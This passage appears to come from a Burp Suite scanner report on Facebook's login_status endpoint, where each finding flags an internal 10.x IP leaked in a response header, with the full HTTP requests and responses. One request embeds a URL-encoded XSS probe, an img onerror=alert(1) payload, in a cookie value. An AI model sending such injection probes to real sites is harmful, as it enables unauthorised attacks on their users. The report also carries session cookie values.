Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f358ac1c84&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1bc0499&relation=parent&transport=postmessage&frame=f153d75394
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.72.51
X-Cnection: close
Date: Thu, 05 May 2011 01:19:44 GMT
Content-Length: 0

20.95. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.92.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9b83f09%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff153201%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ea16fab8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df272ff1874%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ea1449c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f272ff1874&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc5cfad9c&relation=parent&transport=postmessage&frame=f5683d23
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.92.51
X-Cnection: close
Date: Thu, 05 May 2011 01:19:37 GMT
Content-Length: 0

20.96. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.174.36

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32447efb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b74f3024%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d85d7f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df266f11478%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3eb8e8d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f266f11478&origin=http%3A%2F%2Faol.sportingnews.com%2Ffb79ca0e8&relation=parent&transport=postmessage&frame=f367d5ac9c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.36
X-Cnection: close
Date: Thu, 05 May 2011 01:55:50 GMT
Content-Length: 0

20.97. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.228.116

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.228.116
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 22

Invalid Application ID

20.98. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.101.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df169355024%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfaa30bf1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8086eff8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10bb3483%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113b07bd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f10bb3483&origin=http%3A%2F%2Faol.sportingnews.com%2Ff254aa4f9&relation=parent&transport=postmessage&frame=f3b1d61008
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.101.51
X-Cnection: close
Date: Thu, 05 May 2011 01:05:31 GMT
Content-Length: 0

20.99. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.39.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa0a79298%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6f49c9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b445c58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19894175c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ed1f779c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f19894175c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff10a0fc7c&relation=parent&transport=postmessage&frame=f2d6467e74
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.39.69
X-Cnection: close
Date: Thu, 05 May 2011 01:39:11 GMT
Content-Length: 0

20.100. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.32.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22176523%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c87fdfec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2164ef4e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37dcb8fb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df446c14b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f37dcb8fb&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2313123a4&relation=parent&transport=postmessage&frame=f2d45d8298
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.32.51
X-Cnection: close
Date: Thu, 05 May 2011 01:44:43 GMT
Content-Length: 0

20.101. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.141.71

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.71
Connection: close
Date: Thu, 05 May 2011 11:42:04 GMT
Content-Length: 22

Invalid Application ID

20.102. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.135.122

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a243865%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7852a4d4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1456244bc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21051a9c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8230fb08%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21051a9c&origin=http%3A%2F%2Ftechcrunch.com%2Ff399faa324&relation=parent&transport=postmessage&frame=f1320f4c3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.135.122
X-Cnection: close
Date: Thu, 05 May 2011 02:00:46 GMT
Content-Length: 0

20.103. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df339f22bac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df76e3fff8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb839aafc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3680e7058%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd4d57064%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3680e7058&origin=http%3A%2F%2Faol.sportingnews.com%2Ff29392a2b&relation=parent&transport=postmessage&frame=f9deabae
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.38
X-Cnection: close
Date: Thu, 05 May 2011 01:57:02 GMT
Content-Length: 0

20.104. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.88.106

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34e535694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df360000aa%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff3fb7c84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9a7f493c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a67f5c94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9a7f493c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff30bbd6e9&relation=parent&transport=postmessage&frame=f1d721c85
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.88.106
X-Cnection: close
Date: Thu, 05 May 2011 02:06:44 GMT
Content-Length: 0

20.105. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.174.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2634bbf1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a140984%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bfe620b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39a559338%26origin%3Dhttp%253A%252F%252Faol.sportingnews.co